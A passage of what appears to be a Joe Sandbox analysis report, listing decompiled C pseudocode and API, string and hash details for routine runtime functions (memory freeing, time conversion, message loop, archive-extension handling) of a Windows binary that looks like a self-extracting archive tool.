                                                    					_t25 =  *_t57 & 0x0000ffff;
                                                    					_t55 = _t57;
                                                    					if(_t25 == 0) {
                                                    						L19:
                                                    						_t52[_t38] = 0;
                                                    						L00CE3E2E(_t57);
                                                    						return _t52;
                                                    					}
                                                    					_t45 = _t25;
                                                    					 *((intOrPtr*)(_t60 + 0x18)) = 0x20;
                                                    					_t29 = 0xd;
                                                    					_t51 = 0xa;
                                                    					do {
                                                    						if(_t45 != _t29 || _t55[1] != _t51 || _t55[2] != _t29 || _t55[3] != _t51) {
                                                    							if(_t55 <= _t57) {
                                                    								L17:
                                                    								_t52[_t38] = _t45;
                                                    								_t38 = _t38 + 1;
                                                    								goto L18;
                                                    							}
                                                    							_t31 =  *((intOrPtr*)(_t60 + 0x14));
                                                    							if(_t45 != _t31 ||  *((intOrPtr*)(_t55 - 2)) != _t31) {
                                                    								goto L17;
                                                    							} else {
                                                    								E00CE6066( &(_t52[_t38]), L"&nbsp;");
                                                    								_t38 = _t38 + 6;
                                                    								goto L16;
                                                    							}
                                                    						} else {
                                                    							_t58 =  &(_t52[_t38]);
                                                    							_t53 = 0xa;
                                                    							while(_t55[3] == _t53) {
                                                    								E00CE6066(_t58, L"<br>");
                                                    								_t55 =  &(_t55[2]);
                                                    								_t38 = _t38 + 4;
                                                    								_t35 = 0xd;
                                                    								_t58 =  &(_t58[4]);
                                                    								if(_t55[2] == _t35) {
                                                    									continue;
                                                    								}
                                                    								break;
                                                    							}
                                                    							_t52 =  *(_t60 + 0x10);
                                                    							_t55 =  &(_t55[1]);
                                                    							_t57 =  *(_t60 + 0x1c);
                                                    							L16:
                                                    							_t51 = 0xa;
                                                    						}
                                                    						L18:
                                                    						_t55 =  &(_t55[1]);
                                                    						_t30 =  *_t55 & 0x0000ffff;
                                                    						_t45 = _t30;
                                                    						_t29 = 0xd;
                                                    					} while (_t30 != 0);
                                                    					goto L19;
                                                    				}
                                                    				return _t57;
                                                    			}




















                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: _wcslen
                                                    • String ID: $&nbsp;$<br>$<style>body{font-family:"Arial";font-size:12;}</style>
                                                    • API String ID: 176396367-3743748572
                                                    • Opcode ID: e67beaa5fa0aabfb02d8ec39cd752e8d31f4ce6af8f56b80832f82f680f0b394
                                                    • Instruction ID: 1ff2ea22f4cf5efc82f011bcce338f0387091c0f87963ce3996e2f9bdf295120
                                                    • Opcode Fuzzy Hash: e67beaa5fa0aabfb02d8ec39cd752e8d31f4ce6af8f56b80832f82f680f0b394
                                                    • Instruction Fuzzy Hash: 4031903B64438556D634AB919C42B7B73A4EB90320F50442FF69E87380FB70BF4093A5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E00CEC8A4(intOrPtr _a4) {
                                                    				void* _t18;
                                                    
                                                    				_t45 = _a4;
                                                    				if(_a4 != 0) {
                                                    					E00CEC868(_t45, 7);
                                                    					E00CEC868(_t45 + 0x1c, 7);
                                                    					E00CEC868(_t45 + 0x38, 0xc);
                                                    					E00CEC868(_t45 + 0x68, 0xc);
                                                    					E00CEC868(_t45 + 0x98, 2);
                                                    					E00CE8DCC( *((intOrPtr*)(_t45 + 0xa0)));
                                                    					E00CE8DCC( *((intOrPtr*)(_t45 + 0xa4)));
                                                    					E00CE8DCC( *((intOrPtr*)(_t45 + 0xa8)));
                                                    					E00CEC868(_t45 + 0xb4, 7);
                                                    					E00CEC868(_t45 + 0xd0, 7);
                                                    					E00CEC868(_t45 + 0xec, 0xc);
                                                    					E00CEC868(_t45 + 0x11c, 0xc);
                                                    					E00CEC868(_t45 + 0x14c, 2);
                                                    					E00CE8DCC( *((intOrPtr*)(_t45 + 0x154)));
                                                    					E00CE8DCC( *((intOrPtr*)(_t45 + 0x158)));
                                                    					E00CE8DCC( *((intOrPtr*)(_t45 + 0x15c)));
                                                    					return E00CE8DCC( *((intOrPtr*)(_t45 + 0x160)));
                                                    				}
                                                    				return _t18;
                                                    			}





                                                    APIs
                                                      • Part of subcall function 00CEC868: _free.LIBCMT ref: 00CEC891
                                                    • _free.LIBCMT ref: 00CEC8F2
                                                      • Part of subcall function 00CE8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00CEC896,?,00000000,?,00000000,?,00CEC8BD,?,00000007,?,?,00CECCBA,?), ref: 00CE8DE2
                                                      • Part of subcall function 00CE8DCC: GetLastError.KERNEL32(?,?,00CEC896,?,00000000,?,00000000,?,00CEC8BD,?,00000007,?,?,00CECCBA,?,?), ref: 00CE8DF4
                                                    • _free.LIBCMT ref: 00CEC8FD
                                                    • _free.LIBCMT ref: 00CEC908
                                                    • _free.LIBCMT ref: 00CEC95C
                                                    • _free.LIBCMT ref: 00CEC967
                                                    • _free.LIBCMT ref: 00CEC972
                                                    • _free.LIBCMT ref: 00CEC97D
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: _free$ErrorFreeHeapLast
                                                    • String ID:
                                                    • API String ID: 776569668-0
                                                    • Opcode ID: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                    • Instruction ID: b4fb0e72a834beba8870529c639b8cc0ee1e0faa0912b0e4b778991724d002cc
                                                    • Opcode Fuzzy Hash: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                    • Instruction Fuzzy Hash: D7112171580B85AAE530B7B3CD87FCB7BAC9F04B00F444C15B29D660D2DA75B60AA750
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 94%
                                                    			E00CDE5EE() {
                                                    				intOrPtr _t3;
                                                    				_Unknown_base(*)()* _t7;
                                                    				_Unknown_base(*)()* _t10;
                                                    				struct HINSTANCE__* _t15;
                                                    
                                                    				_t3 =  *0xd21cd8;
                                                    				if(_t3 == 1) {
                                                    					L11:
                                                    					return 0;
                                                    				}
                                                    				if(_t3 != 0) {
                                                    					return 1;
                                                    				}
                                                    				_t15 = GetModuleHandleW(L"KERNEL32.DLL");
                                                    				if(_t15 != 0) {
                                                    					_t7 = GetProcAddress(_t15, "AcquireSRWLockExclusive");
                                                    					if(_t7 == 0) {
                                                    						goto L3;
                                                    					}
                                                    					 *0xd21cdc = _t7;
                                                    					_t10 = GetProcAddress(_t15, "ReleaseSRWLockExclusive");
                                                    					if(_t10 == 0) {
                                                    						goto L3;
                                                    					}
                                                    					 *0xd21ce0 = _t10;
                                                    					L7:
                                                    					asm("lock cmpxchg [edx], ecx");
                                                    					if(0 != 0 || _t15 != 1) {
                                                    						return 0xbadbad;
                                                    					} else {
                                                    						goto L11;
                                                    					}
                                                    				}
                                                    				L3:
                                                    				_t15 = 1;
                                                    				goto L7;
                                                    			}








                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,00CDE669,00CDE5CC,00CDE86D), ref: 00CDE605
                                                    • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 00CDE61B
                                                    • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 00CDE630
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: AddressProc$HandleModule
                                                    • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                    • API String ID: 667068680-1718035505
                                                    • Opcode ID: f5cd57587a903cf35a6deb889793495124549858e960edda4ee42cce3c7a4836
                                                    • Instruction ID: 0c8afae9adf286ae41dfca87cd5aa24d4de1476f1ccda640d61e119ad1813283
                                                    • Opcode Fuzzy Hash: f5cd57587a903cf35a6deb889793495124549858e960edda4ee42cce3c7a4836
                                                    • Instruction Fuzzy Hash: 70F0C23978166AAB0B216E765C8467A62C86A35755300443BFB15DB300EB10CE57AAA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 65%
                                                    			E00CD146A(signed int* __ecx, void* __edx, intOrPtr* _a4) {
                                                    				char _v16;
                                                    				struct _SYSTEMTIME _v32;
                                                    				struct _SYSTEMTIME _v48;
                                                    				struct _FILETIME _v64;
                                                    				struct _FILETIME _v72;
                                                    				intOrPtr _v76;
                                                    				struct _FILETIME _v84;
                                                    				signed int _t56;
                                                    				signed int _t70;
                                                    				signed int _t72;
                                                    				signed int _t77;
                                                    				signed int _t85;
                                                    				intOrPtr* _t89;
                                                    				signed int _t90;
                                                    				signed int _t92;
                                                    				signed int* _t93;
                                                    
                                                    				_t89 = _a4;
                                                    				_t93 = __ecx;
                                                    				_v48.wYear =  *_t89;
                                                    				_v48.wMonth =  *((intOrPtr*)(_t89 + 4));
                                                    				_v48.wDay =  *((intOrPtr*)(_t89 + 8));
                                                    				_v48.wHour =  *((intOrPtr*)(_t89 + 0xc));
                                                    				_v48.wMinute =  *((intOrPtr*)(_t89 + 0x10));
                                                    				_v48.wSecond =  *((intOrPtr*)(_t89 + 0x14));
                                                    				_v48.wMilliseconds = 0;
                                                    				_v48.wDayOfWeek.wYear = 0;
                                                    				if(SystemTimeToFileTime( &_v48,  &_v64) == 0) {
                                                    					_t90 = 0;
                                                    					_t77 = 0;
                                                    				} else {
                                                    					if(E00CCB146() >= 0x600) {
                                                    						FileTimeToSystemTime( &_v64,  &_v32);
                                                    						__imp__TzSpecificLocalTimeToSystemTime(0,  &_v32,  &_v16);
                                                    						SystemTimeToFileTime( &(_v32.wDayOfWeek),  &_v84);
                                                    						SystemTimeToFileTime( &(_v48.wDayOfWeek),  &(_v72.dwHighDateTime));
                                                    						_t70 = _v84.dwHighDateTime + _v72.dwLowDateTime;
                                                    						asm("sbb eax, [esp+0x24]");
                                                    						asm("sbb eax, esi");
                                                    						asm("adc eax, esi");
                                                    						_t85 = 0 - _v72.dwHighDateTime.dwLowDateTime + _v84.dwLowDateTime + _v76;
                                                    						asm("adc eax, esi");
                                                    					} else {
                                                    						LocalFileTimeToFileTime( &_v64,  &_v72);
                                                    						_t70 = _v72.dwHighDateTime.dwLowDateTime;
                                                    						_t85 = _v72.dwLowDateTime;
                                                    					}
                                                    					_t92 = 0x64;
                                                    					_t72 = _t85;
                                                    					_t77 = _t70 * _t92 + (_t72 * _t92 >> 0x20);
                                                    					_t90 = _t72 * _t92;
                                                    				}
                                                    				 *_t93 = _t90;
                                                    				_a4 = _t77;
                                                    				_t56 =  *((intOrPtr*)(_t89 + 0x18)) + _t90;
                                                    				asm("adc ecx, ebx");
                                                    				 *_t93 = _t56;
                                                    				_a4 = 0;
                                                    				return _t56;
                                                    			}




















                                                    APIs
                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00CD14C2
                                                      • Part of subcall function 00CCB146: GetVersionExW.KERNEL32(?), ref: 00CCB16B
                                                    • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00CD14E6
                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 00CD1500
                                                    • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00CD1513
                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00CD1523
                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00CD1533
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: Time$File$System$Local$SpecificVersion
                                                    • String ID:
                                                    • API String ID: 2092733347-0
                                                    • Opcode ID: 59260349d37aac74b76e050f2d5a4cab0063b189252243d714484c0be444f586
                                                    • Instruction ID: 116a628425041425fae7ddcb19d7b4dcb8f64720a2af96792425fd5eeeea57a0
                                                    • Opcode Fuzzy Hash: 59260349d37aac74b76e050f2d5a4cab0063b189252243d714484c0be444f586
                                                    • Instruction Fuzzy Hash: E131D775108345ABC704DFA8D884A9FB7E8BF98714F048A1EF995C3210E734D649CBA6
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 83%
                                                    			E00CE2AFA(void* __ecx, void* __edx) {
                                                    				void* _t4;
                                                    				void* _t8;
                                                    				void* _t11;
                                                    				void* _t13;
                                                    				void* _t14;
                                                    				void* _t16;
                                                    				void* _t18;
                                                    				void* _t24;
                                                    				long _t25;
                                                    				void* _t28;
                                                    
                                                    				_t13 = __ecx;
                                                    				if( *0xcfe7d0 != 0xffffffff) {
                                                    					_t25 = GetLastError();
                                                    					_t11 = E00CE3CCD(_t13, __eflags,  *0xcfe7d0);
                                                    					_t14 = _t24;
                                                    					__eflags = _t11 - 0xffffffff;
                                                    					if(_t11 == 0xffffffff) {
                                                    						L5:
                                                    						_t11 = 0;
                                                    					} else {
                                                    						__eflags = _t11;
                                                    						if(__eflags == 0) {
                                                    							_t4 = E00CE3D08(_t14, __eflags,  *0xcfe7d0, 0xffffffff);
                                                    							_pop(_t16);
                                                    							__eflags = _t4;
                                                    							if(_t4 != 0) {
                                                    								_push(0x28);
                                                    								_t28 = E00CE8DC1(_t16);
                                                    								_t18 = 1;
                                                    								__eflags = _t28;
                                                    								if(__eflags == 0) {
                                                    									L8:
                                                    									_t11 = 0;
                                                    									E00CE3D08(_t18, __eflags,  *0xcfe7d0, 0);
                                                    								} else {
                                                    									_t8 = E00CE3D08(_t18, __eflags,  *0xcfe7d0, _t28);
                                                    									_pop(_t18);
                                                    									__eflags = _t8;
                                                    									if(__eflags != 0) {
                                                    										_t11 = _t28;
                                                    										_t28 = 0;
                                                    										__eflags = 0;
                                                    									} else {
                                                    										goto L8;
                                                    									}
                                                    								}
                                                    								L00CE3E2E(_t28);
                                                    							} else {
                                                    								goto L5;
                                                    							}
                                                    						}
                                                    					}
                                                    					SetLastError(_t25);
                                                    					return _t11;
                                                    				} else {
                                                    					return 0;
                                                    				}
                                                    			}














                                                    APIs
                                                    • GetLastError.KERNEL32(?,?,00CE2AF1,00CE02FC,00CDFA34), ref: 00CE2B08
                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00CE2B16
                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00CE2B2F
                                                    • SetLastError.KERNEL32(00000000,00CE2AF1,00CE02FC,00CDFA34), ref: 00CE2B81
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: ErrorLastValue___vcrt_
                                                    • String ID:
                                                    • API String ID: 3852720340-0
                                                    • Opcode ID: d2784b1d664d5f5f4ee9903ba63e9c920ac22f6d66201f7027a430e0f6f6ec26
                                                    • Instruction ID: 079c0443349c9c496cb619b606790b09eab38698aeb6d253791013228af8ced5
                                                    • Opcode Fuzzy Hash: d2784b1d664d5f5f4ee9903ba63e9c920ac22f6d66201f7027a430e0f6f6ec26
                                                    • Instruction Fuzzy Hash: 0201D4321183926FA6242B777C89B3A2B9EEB51774760073AF121560F0EF956E00E545
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 69%
                                                    			E00CE97E5(void* __ebx, void* __ecx, void* __edx) {
                                                    				void* __edi;
                                                    				void* __esi;
                                                    				intOrPtr _t2;
                                                    				void* _t3;
                                                    				void* _t4;
                                                    				intOrPtr _t9;
                                                    				void* _t11;
                                                    				void* _t20;
                                                    				void* _t21;
                                                    				void* _t23;
                                                    				void* _t25;
                                                    				void* _t27;
                                                    				void* _t29;
                                                    				void* _t30;
                                                    				void* _t31;
                                                    				void* _t32;
                                                    				long _t36;
                                                    				long _t37;
                                                    				void* _t40;
                                                    
                                                    				_t29 = __edx;
                                                    				_t23 = __ecx;
                                                    				_t20 = __ebx;
                                                    				_push(_t30);
                                                    				_t36 = GetLastError();
                                                    				_t2 =  *0xcfe7fc; // 0x6
                                                    				_t42 = _t2 - 0xffffffff;
                                                    				if(_t2 == 0xffffffff) {
                                                    					L2:
                                                    					_t3 = E00CEB136(_t23, 1, 0x364);
                                                    					_t31 = _t3;
                                                    					_pop(_t25);
                                                    					if(_t31 != 0) {
                                                    						_t4 = E00CEAEB1(_t20, _t25, _t31, __eflags,  *0xcfe7fc, _t31);
                                                    						__eflags = _t4;
                                                    						if(_t4 != 0) {
                                                    							E00CE9649(_t25, _t31, 0xd22288);
                                                    							E00CE8DCC(0);
                                                    							_t40 = _t40 + 0xc;
                                                    							__eflags = _t31;
                                                    							if(_t31 == 0) {
                                                    								goto L9;
                                                    							} else {
                                                    								goto L8;
                                                    							}
                                                    						} else {
                                                    							_push(_t31);
                                                    							goto L4;
                                                    						}
                                                    					} else {
                                                    						_push(_t3);
                                                    						L4:
                                                    						E00CE8DCC();
                                                    						_pop(_t25);
                                                    						L9:
                                                    						SetLastError(_t36);
                                                    						E00CE8D24(_t20, _t29, _t31, _t36);
                                                    						asm("int3");
                                                    						_push(_t20);
                                                    						_push(_t36);
                                                    						_push(_t31);
                                                    						_t37 = GetLastError();
                                                    						_t21 = 0;
                                                    						_t9 =  *0xcfe7fc; // 0x6
                                                    						_t45 = _t9 - 0xffffffff;
                                                    						if(_t9 == 0xffffffff) {
                                                    							L12:
                                                    							_t32 = E00CEB136(_t25, 1, 0x364);
                                                    							_pop(_t27);
                                                    							if(_t32 != 0) {
                                                    								_t11 = E00CEAEB1(_t21, _t27, _t32, __eflags,  *0xcfe7fc, _t32);
                                                    								__eflags = _t11;
                                                    								if(_t11 != 0) {
                                                    									E00CE9649(_t27, _t32, 0xd22288);
                                                    									E00CE8DCC(_t21);
                                                    									__eflags = _t32;
                                                    									if(_t32 != 0) {
                                                    										goto L19;
                                                    									} else {
                                                    										goto L18;
                                                    									}
                                                    								} else {
                                                    									_push(_t32);
                                                    									goto L14;
                                                    								}
                                                    							} else {
                                                    								_push(_t21);
                                                    								L14:
                                                    								E00CE8DCC();
                                                    								L18:
                                                    								SetLastError(_t37);
                                                    							}
                                                    						} else {
                                                    							_t32 = E00CEAE5B(0, _t25, _t31, _t45, _t9);
                                                    							if(_t32 != 0) {
                                                    								L19:
                                                    								SetLastError(_t37);
                                                    								_t21 = _t32;
                                                    							} else {
                                                    								goto L12;
                                                    							}
                                                    						}
                                                    						return _t21;
                                                    					}
                                                    				} else {
                                                    					_t31 = E00CEAE5B(__ebx, _t23, _t30, _t42, _t2);
                                                    					if(_t31 != 0) {
                                                    						L8:
                                                    						SetLastError(_t36);
                                                    						return _t31;
                                                    					} else {
                                                    						goto L2;
                                                    					}
                                                    				}
                                                    			}

                                                    APIs
                                                    • GetLastError.KERNEL32(?,00D01098,00CE4674,00D01098,?,?,00CE40EF,?,?,00D01098), ref: 00CE97E9
                                                    • _free.LIBCMT ref: 00CE981C
                                                    • _free.LIBCMT ref: 00CE9844
                                                    • SetLastError.KERNEL32(00000000,?,00D01098), ref: 00CE9851
                                                    • SetLastError.KERNEL32(00000000,?,00D01098), ref: 00CE985D
                                                    • _abort.LIBCMT ref: 00CE9863
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$_free$_abort
                                                    • String ID:
                                                    • API String ID: 3160817290-0
                                                    • Opcode ID: ba652a011d2fdc0285a7ebb227116b7427c3ad6c34f6586002e95d69e1fb1468
                                                    • Instruction ID: ea1a8d7c2134f078e651f7c6badbd51e0ce989989c0fbf7f7ee3aad15ccbee66
                                                    • Opcode Fuzzy Hash: ba652a011d2fdc0285a7ebb227116b7427c3ad6c34f6586002e95d69e1fb1468
                                                    • Instruction Fuzzy Hash: EEF0A4361406D266C73233277C0AB3F2A69DFD2775F250125F528921F2EE348A05D566
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E00CDDC3B(void* _a4) {
                                                    				struct tagMSG _v32;
                                                    				long _t7;
                                                    				long _t10;
                                                    
                                                    				_t7 = WaitForSingleObject(_a4, 0xa);
                                                    				if(_t7 == 0x102) {
                                                    					do {
                                                    						if(PeekMessageW( &_v32, 0, 0, 0, 0) != 0) {
                                                    							GetMessageW( &_v32, 0, 0, 0);
                                                    							TranslateMessage( &_v32);
                                                    							DispatchMessageW( &_v32);
                                                    						}
                                                    						_t10 = WaitForSingleObject(_a4, 0xa);
                                                    					} while (_t10 == 0x102);
                                                    					return _t10;
                                                    				}
                                                    				return _t7;
                                                    			}

                                                    APIs
                                                    • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00CDDC47
                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00CDDC61
                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00CDDC72
                                                    • TranslateMessage.USER32(?), ref: 00CDDC7C
                                                    • DispatchMessageW.USER32(?), ref: 00CDDC86
                                                    • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00CDDC91
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                                                    • String ID:
                                                    • API String ID: 2148572870-0
                                                    • Opcode ID: 757b2e8c3205a196e7b19c4eca095ac1f4282726b75a58896e35b6073d9716c5
                                                    • Instruction ID: 2674951eefd261d97164b843f2e946a66bc480b070475869f001075cc800b20e
                                                    • Opcode Fuzzy Hash: 757b2e8c3205a196e7b19c4eca095ac1f4282726b75a58896e35b6073d9716c5
                                                    • Instruction Fuzzy Hash: CBF03C72A01219BBCB206BA5DD4CEDF7F7DEF51791F004012B60AD2150D6798686CBB1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E00CCC0C5(short* _a4, char _a12) {
                                                    				signed short* _v4;
                                                    				void* __ebp;
                                                    				intOrPtr* _t20;
                                                    				signed short* _t24;
                                                    				char _t27;
                                                    				char _t30;
                                                    				signed short* _t31;
                                                    				short _t32;
                                                    				signed int _t33;
                                                    				short _t34;
                                                    				signed short* _t37;
                                                    				char _t39;
                                                    				char _t40;
                                                    				char _t41;
                                                    				intOrPtr _t44;
                                                    				void* _t47;
                                                    				void* _t48;
                                                    				short* _t54;
                                                    				intOrPtr* _t56;
                                                    				signed short _t57;
                                                    				short* _t58;
                                                    				intOrPtr* _t59;
                                                    				signed int _t62;
                                                    				signed short* _t63;
                                                    				short _t66;
                                                    				signed short _t67;
                                                    
                                                    				_t58 = _a4;
                                                    				_t20 = E00CCB92D(_t58);
                                                    				_t44 = _a4;
                                                    				_t59 = _t20;
                                                    				_t68 = _t59;
                                                    				if(_t59 != 0) {
                                                    					__eflags =  *((intOrPtr*)(_t59 + 2));
                                                    					if( *((intOrPtr*)(_t59 + 2)) == 0) {
                                                    						L7:
                                                    						__eflags = _t44 - (_t59 - _t58 >> 1);
                                                    						E00CD0602(_t59, L".rar", _t44 - (_t59 - _t58 >> 1));
                                                    					} else {
                                                    						_t40 = E00CD1FBB(_t59, L".exe");
                                                    						__eflags = _t40;
                                                    						if(_t40 == 0) {
                                                    							goto L7;
                                                    						} else {
                                                    							_t41 = E00CD1FBB(_t59, L".sfx");
                                                    							__eflags = _t41;
                                                    							if(_t41 == 0) {
                                                    								goto L7;
                                                    							}
                                                    						}
                                                    					}
                                                    				} else {
                                                    					E00CD05DA(_t68, _t58, L".rar", _t44);
                                                    					_t59 = E00CCB92D(_t58);
                                                    					if(_t59 == 0) {
                                                    						L2:
                                                    						 *_t58 = 0;
                                                    						return 0;
                                                    					}
                                                    				}
                                                    				_t24 = 0x2e;
                                                    				_v4 = _t24;
                                                    				__eflags =  *_t59 - _t24;
                                                    				if( *_t59 != _t24) {
                                                    					goto L2;
                                                    				}
                                                    				__eflags =  *((intOrPtr*)(_t59 + 2));
                                                    				if( *((intOrPtr*)(_t59 + 2)) == 0) {
                                                    					goto L2;
                                                    				}
                                                    				__eflags = _a12;
                                                    				if(__eflags != 0) {
                                                    					_t12 = _t59 + 4; // 0x4
                                                    					_t65 = _t12;
                                                    					_t27 = E00CD047A( *_t12 & 0x0000ffff);
                                                    					__eflags = _t27;
                                                    					if(_t27 == 0) {
                                                    						L30:
